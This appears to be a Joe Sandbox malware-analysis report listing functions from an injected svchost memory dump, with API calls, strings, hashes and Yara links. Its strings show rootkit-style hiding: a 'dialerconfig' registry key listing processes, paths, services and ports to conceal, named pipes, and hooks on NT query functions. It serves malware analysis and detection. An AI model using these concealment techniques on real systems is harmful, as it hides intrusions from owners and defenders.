Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: ECE1E072704AC08AEB80DFA5E2882DE7BB1F385788F144126DF6A57FA9DE35C556C700

Function 0000026F48141650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000026F4814165B
HeapAlloc.KERNEL32 ref: 0000026F4814166A

Part of subcall function 0000026F48141274: GetProcessHeap.KERNEL32 ref: 0000026F4814127A
Part of subcall function 0000026F48141274: HeapAlloc.KERNEL32 ref: 0000026F48141289
Part of subcall function 0000026F48141274: GetProcessHeap.KERNEL32 ref: 0000026F481412A3
Part of subcall function 0000026F48141274: HeapAlloc.KERNEL32 ref: 0000026F481412B4

RegOpenKeyExW.ADVAPI32 ref: 0000026F481416DA
RegOpenKeyExW.ADVAPI32 ref: 0000026F48141707
RegCloseKey.ADVAPI32 ref: 0000026F48141721
RegOpenKeyExW.ADVAPI32 ref: 0000026F48141741
RegCloseKey.ADVAPI32 ref: 0000026F4814175C
RegOpenKeyExW.ADVAPI32 ref: 0000026F4814177C
RegCloseKey.ADVAPI32 ref: 0000026F48141797
RegOpenKeyExW.ADVAPI32 ref: 0000026F481417B7
RegCloseKey.ADVAPI32 ref: 0000026F481417D2
RegOpenKeyExW.ADVAPI32 ref: 0000026F481417F2
RegCloseKey.ADVAPI32 ref: 0000026F4814180D
RegOpenKeyExW.ADVAPI32 ref: 0000026F4814182D
RegCloseKey.ADVAPI32 ref: 0000026F48141848
RegOpenKeyExW.ADVAPI32 ref: 0000026F48141868
RegCloseKey.ADVAPI32 ref: 0000026F48141883
RegOpenKeyExW.ADVAPI32 ref: 0000026F481418A3
RegCloseKey.ADVAPI32 ref: 0000026F481418BE
RegCloseKey.ADVAPI32 ref: 0000026F481418C8

Part of subcall function 0000026F481412C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000026F48141326
Part of subcall function 0000026F481412C8: GetProcessHeap.KERNEL32 ref: 0000026F48141334
Part of subcall function 0000026F481412C8: HeapAlloc.KERNEL32 ref: 0000026F48141345
Part of subcall function 0000026F481412C8: RegEnumValueW.ADVAPI32 ref: 0000026F481413A1
Part of subcall function 0000026F481412C8: GetProcessHeap.KERNEL32 ref: 0000026F481413E9
Part of subcall function 0000026F481412C8: HeapAlloc.KERNEL32 ref: 0000026F481413F7
Part of subcall function 0000026F481412C8: GetProcessHeap.KERNEL32 ref: 0000026F4814141B
Part of subcall function 0000026F481412C8: HeapFree.KERNEL32 ref: 0000026F48141429
Part of subcall function 0000026F481412C8: lstrlenW.KERNEL32 ref: 0000026F48141432
Part of subcall function 0000026F481412C8: GetProcessHeap.KERNEL32 ref: 0000026F48141440
Part of subcall function 0000026F481412C8: HeapAlloc.KERNEL32 ref: 0000026F4814144E

Strings

tcp_local, xrefs: 0000026F48141826
tcp_remote, xrefs: 0000026F48141861
pid, xrefs: 0000026F4814173A
paths, xrefs: 0000026F481417B0
process_names, xrefs: 0000026F48141775
startup, xrefs: 0000026F481416FD
SOFTWARE\dialerconfig, xrefs: 0000026F481416BA
service_names, xrefs: 0000026F481417EB
udp, xrefs: 0000026F4814189C

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 0feda6f5889ea005220ee92aa91a92338ab32245e70121e3e3d2e27acf8abcb7
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 3571F936310B9085FF909F65F95869A67A4F7C5B88F805132DB6D87E29EF3AC485C300

Function 0000026F481412C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000026F48141326
GetProcessHeap.KERNEL32 ref: 0000026F48141334
HeapAlloc.KERNEL32 ref: 0000026F48141345
RegEnumValueW.ADVAPI32 ref: 0000026F481413A1

Part of subcall function 0000026F48141554: StrCmpIW.SHLWAPI ref: 0000026F48141585

GetProcessHeap.KERNEL32 ref: 0000026F481413E9
HeapAlloc.KERNEL32 ref: 0000026F481413F7
GetProcessHeap.KERNEL32 ref: 0000026F4814141B
HeapFree.KERNEL32 ref: 0000026F48141429
lstrlenW.KERNEL32 ref: 0000026F48141432
GetProcessHeap.KERNEL32 ref: 0000026F48141440
HeapAlloc.KERNEL32 ref: 0000026F4814144E
StrCpyW.SHLWAPI ref: 0000026F48141470
GetProcessHeap.KERNEL32 ref: 0000026F48141485
HeapFree.KERNEL32 ref: 0000026F48141493

Strings

d, xrefs: 0000026F48141365

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: d8b77e30d10187b6e238fb09d108d934aa8d5339bd8c808c5cc9b1a7f16a7319
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: C2514972214B9492EB94DB66F68839AB3A1F7C9B80F448126DB6907F24DF39C095C700

Function 0000026F48141EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000026F48141EBF

Part of subcall function 0000026F48142174: GetModuleHandleA.KERNEL32 ref: 0000026F4814218C
Part of subcall function 0000026F48142174: GetProcAddress.KERNEL32 ref: 0000026F4814219D

Part of subcall function 0000026F48145C10: GetCurrentThreadId.KERNEL32 ref: 0000026F48145C4B

Strings

NtEnumerateValueKey, xrefs: 0000026F48141F76
NtQueryDirectoryFileEx, xrefs: 0000026F48141F3C
sechost.dll, xrefs: 0000026F48141FD9
ntdll.dll, xrefs: 0000026F48141ECD
NtQuerySystemInformation, xrefs: 0000026F48141EE5
NtResumeThread, xrefs: 0000026F48141F02
EnumServiceGroupW, xrefs: 0000026F48141F90
advapi32.dll, xrefs: 0000026F48141F97, 0000026F48141FB8
NtDeviceIoControlFile, xrefs: 0000026F48141FF6
NtQueryDirectoryFile, xrefs: 0000026F48141F1F
EnumServicesStatusExW, xrefs: 0000026F48141FB1, 0000026F48141FD2
NtEnumerateKey, xrefs: 0000026F48141F59

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 8d530b5ad600678bded0f3ca32e8e8ab6ad46161c7cd0b0e038aafb259873732
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: E63183B05519CAA1FE84EF65FB596D62321A7C4B84FC05433973A03D759E7AC2C9C390

Function 0000026F481423F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000026F48142405
GetCurrentProcessId.KERNEL32 ref: 0000026F4814240F

Part of subcall function 0000026F481419AC: OpenProcess.KERNEL32 ref: 0000026F481419CA
Part of subcall function 0000026F481419AC: IsWow64Process.KERNEL32 ref: 0000026F481419E0
Part of subcall function 0000026F481419AC: CloseHandle.KERNEL32 ref: 0000026F481419FB

CreateFileW.KERNEL32 ref: 0000026F48142468
WriteFile.KERNEL32 ref: 0000026F48142490
ReadFile.KERNEL32 ref: 0000026F481424AF
CloseHandle.KERNEL32 ref: 0000026F481424B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000026F4814243F
\\.\pipe\dialerchildproc64, xrefs: 0000026F48142438

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 83f3a500db1ece9cee6fb09c38b605b236212783faf565117bb27b34f9c2001d
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 2B21103661478082FB508B65F64835B67A0F7C9BA4F944226EB7907FA8DF3DC189CB00

Function 0000026F4814104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000026F481410AB
RegEnumValueW.ADVAPI32 ref: 0000026F4814110E
GetProcessHeap.KERNEL32 ref: 0000026F48141155
HeapAlloc.KERNEL32 ref: 0000026F48141163
GetProcessHeap.KERNEL32 ref: 0000026F48141187
HeapFree.KERNEL32 ref: 0000026F48141195

Strings

d, xrefs: 0000026F481410CE

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 5ac9bf650ce93fb90483a5336334412c2da3793bb5f4efa87313a72e79f75cd1
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: E9416F33214BD097EBA48F65E54879BB7A1F389B84F408126DBA907F54DF39D1A4CB00

Function 0000026F47BD69F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000026F47BD6A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000026F47BD6A6A
_RTC_Initialize.LIBCMT ref: 0000026F47BD6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000026F47BD6ABE
__scrt_release_startup_lock.LIBCMT ref: 0000026F47BD6AE9

Memory Dump Source

Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 9b9b54fc7d13ade8a6b323c03a89cec80674c44a7caf2356ed6a231d4a5fa086
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 9181B231609A8586FED8AB25B74939B66B0EB857C8F484035EF4583F9EDF3BC8459700

Function 0000026F481475F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000026F48147618
__scrt_acquire_startup_lock.LIBCMT ref: 0000026F4814766A
_RTC_Initialize.LIBCMT ref: 0000026F48147698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000026F481476BE
__scrt_release_startup_lock.LIBCMT ref: 0000026F481476E9

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: f72babb935fee18d8c9d9c7d6c840307578cc8e4329242e2ae7cd8dd12da23b8
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 198180316042CA85FED0AB69B64D36B6291A7C5F80F544C379B3597FA6DF3AC8C58700

Function 0000026F48149804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 0000026F48149889
GetLastError.KERNEL32 ref: 0000026F48149897
LoadLibraryExW.KERNEL32 ref: 0000026F481498C1
FreeLibrary.KERNEL32 ref: 0000026F48149907
GetProcAddress.KERNEL32 ref: 0000026F48149913

Strings

api-ms-, xrefs: 0000026F481498A9

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 853872dc391dd9b499113e76563f507fa7b886fa3bf84a016bfb3060f1047882
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 9131C271202BD091FE92DB16FA0879A6394BB89FA4F590536EF3D47BA1DF39C0858300

Function 0000026F48151B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 0000026F48151BCD
GetLastError.KERNEL32 ref: 0000026F48151BD9
CloseHandle.KERNEL32 ref: 0000026F48151BF1
CreateFileW.KERNEL32 ref: 0000026F48151C1C
WriteConsoleW.KERNEL32 ref: 0000026F48151C3B

Strings

CONOUT$, xrefs: 0000026F48151BFD

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 51b846eec42041f346ea40fe3cf0891c0b4248e5707a533d979b78e85c13743c
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 5B118B31214B8086FB909B56F95831AA2A0F3C9BE4F400236EB7987BA4CF7AC9448740

Function 0000026F48145C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026F48145C4B
GetThreadContext.KERNEL32 ref: 0000026F48145DB5

Part of subcall function 0000026F48145A40: GetCurrentThreadId.KERNEL32 ref: 0000026F48145A44

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 7b0e80c998ee880d654b37696eba2a0948381147c1b08b3f2d3b1c2e78d19020
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 6ED17C76209B8885EEB09B19F59435B77A0F7C8F84F140526EBAE47BA5DF39C581CB00

Function 0000026F481430B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026F481430D7
HeapAlloc.KERNEL32 ref: 0000026F481430EA
StrCmpNIW.SHLWAPI ref: 0000026F4814316B
GetProcessHeap.KERNEL32 ref: 0000026F481431D1
HeapFree.KERNEL32 ref: 0000026F481431DF

Strings

dialer, xrefs: 0000026F48143164

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: b6404912e6c1473b82eb836b7214aeddb66cac03fafc7b10dbb3ee9a9587b809
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: D4316031701B9592FF959F5ABA48A6A63A0FB85F94F0441329F7A07F54EF3AC4A18700

Function 0000026F48141A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000026F48141A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000026F48141A58
PathFindFileNameW.SHLWAPI ref: 0000026F48141A67
lstrlenW.KERNEL32 ref: 0000026F48141A73
StrCpyW.SHLWAPI ref: 0000026F48141A86
CloseHandle.KERNEL32 ref: 0000026F48141A94

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: f3166ca4b5420848e1af49b5022b76038be322e8bbeb26f8073b08130f5955aa
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: D9015B31300A8196FA90DB26B59C35A63A1F789FC0F984436CFA943B64DE3AC9858700

Function 0000026F481437AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000026F481437C8
GetCurrentProcess.KERNEL32 ref: 0000026F481437D6
VirtualProtectEx.KERNEL32 ref: 0000026F481437F8
GetCurrentProcess.KERNEL32 ref: 0000026F48143819
VirtualProtectEx.KERNEL32 ref: 0000026F4814383A
TerminateThread.KERNEL32 ref: 0000026F48143849

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: a3876ba4f922288aea9d6b96c431ea7b649966905969bf4ba9e1eff6582024cf
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: F711397460178182FFA09B65F55D717A2A0BB99F81F44053ACB7907B64EF3EC0488700

Function 0000026F481490F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026F48149103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026F48149198
RtlUnwindEx.NTDLL ref: 0000026F481491E7

Strings

csm, xrefs: 0000026F4814917E
f, xrefs: 0000026F48149116

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 7ffa0dfc42b86114ccbad2c74472834742de292cb99e987e3827f1cf5a6acb06
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 85518C326116808AEF96CB15F64CB5A7395F3D5F98F5081329B3A47BA8EF36C881C700

Function 0000026F481490D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026F48149103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026F48149198
RtlUnwindEx.NTDLL ref: 0000026F481491E7

Strings

csm, xrefs: 0000026F4814917E
f, xrefs: 0000026F48149116

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: bd11eaad6d4a6c48113b22b140734d13293aafa6e9482693a74bb70249ae0919
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 4931AD3221068096EB91DF15F94CB1A37A5F384F98F148126AF7B07B68CF3AC980C704

Function 0000026F48141AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000026F48141AD8
StrCmpNIW.SHLWAPI ref: 0000026F48141AF2
lstrlenW.KERNEL32 ref: 0000026F48141B01
StrCpyW.SHLWAPI ref: 0000026F48141B16

Strings

\\?\, xrefs: 0000026F48141AE6

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 7725aefc686e0c70b42bb15f100827db4caf4e5721decb14bf5aef7075c7a084
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 6CF0317230468192FFA08B65F69D39B6760F784B88F848036CB6947E64DF2DC68CC700

Function 0000026F48143200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000026F48143222
StrCpyW.SHLWAPI ref: 0000026F48143232
StrCatW.SHLWAPI ref: 0000026F4814323E
PathCombineW.SHLWAPI ref: 0000026F4814324C

Strings

\\.\pipe\, xrefs: 0000026F48143218

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 5acd88dc4c4579d9f9ab8bda5339a9b897349cc324ebf3f1b5c6224b8ea3de84
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: D7F05E30204BC092FE808B1BBA0912AA220ABC9FD0F4881329F7A07F68CE29C4818300

Function 0000026F4814A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000026F4814A154
GetProcAddress.KERNEL32 ref: 0000026F4814A16A
FreeLibrary.KERNEL32 ref: 0000026F4814A187

Strings

CorExitProcess, xrefs: 0000026F4814A163
mscoree.dll, xrefs: 0000026F4814A14B

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: f7e1def3eeac2e1f6742476391c635f94af88b283076f888d1c3f3be57755c57
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 2AF0DA75321B8491FFD54B64F9883662760ABC8B90F44202B963B47D74DF29C4C8C700

Function 0000026F481451B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026F48145236

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: d069feed6c0b0f3db1769c3cdc5b9bfc77c0779bce8bde6ed98114375a46bb52
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 7F029936219BC486EBA08B55F59435BB7A0F3C5B94F104126EBAE87B69DF79C484CB00

Function 0000026F48150860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000026F481508A2
GetConsoleMode.KERNEL32 ref: 0000026F48150960
GetLastError.KERNEL32 ref: 0000026F481509EA

Memory Dump Source

Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: be3327ef49c544beef6a98aa97293178206f5ba2597d4283de1411070fa82db6
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 06819132A1069089FF90AFA5AA987AF27A1B7C4B94F444137DF3A53EA5DF36C441C710

Function 0000026F481457F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026F48145806

Memory Dump Source

